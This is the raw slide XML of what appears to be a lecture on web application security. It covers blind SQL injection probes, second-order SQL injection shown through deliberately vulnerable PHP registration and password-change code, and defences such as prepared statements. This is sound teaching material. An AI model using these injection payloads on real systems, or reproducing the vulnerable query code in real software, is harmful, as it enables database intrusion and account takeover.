              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When testing for vulnerability, we know 1=1 is always true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>However, when we inject other statements, we do not have any information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What we know: If the same record is returned, the statement must have been true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For example, we can ask server if the current user is “h4x0r”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>()=‘h4x0r’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By combining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>subqueries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and functions, we can ask more complex questions (e.g., extract the name of a database table character by character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SUBSTRING(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>), 1, 1) &lt; '?'		</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254445238"/>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4483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4483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4483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4483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4483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4483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4483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9826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Second Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL code is injected into an application, but the SQL statement is invoked at a later point in time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>e.g., Guestbook, statistics page, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Even if application escapes single quotes, second order SQL injection might be possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attacker sets user name to: john’--, application safely escapes value to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>john\' -- on insertion into the database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a later point, attacker changes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>password :</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>update users set password= … where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>username ='john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>--'</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="639084197"/>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8982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8982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8982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8982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8982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8982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register.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = "insert into users (username, password) values ('" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($_POST['name']) . "', '" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($_POST['password']) . "');";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysq_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_insert_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$_SESSION['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'] = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314766957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the Difference?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Von Neumann Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and data are stored in the same place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fundamentally, no difference to the CPU between code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Harvard Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and data are stored in a separate place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fundamental difference between code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which one is the dominate architecture today?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274199702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change_password.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = $_POST['password'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("select username, password from users where id = '" . $_SESSION['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'] . "';");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$query = "update users set password = '" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>new_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) . "' where username = '" . $row['username'] . "';";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300326093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1874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection Solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Developers must never allow client-supplied data to modify SQL statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Isolate applications from SQL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All SQL statements required by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>are stored procedures on the database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Statements are compiled into SQL statements before user input is added</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1993334169"/>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918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9187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9187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9187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9187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9187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SQL Injection – Prevention</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Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specify structure of query then provide arguments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prepared statements – example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
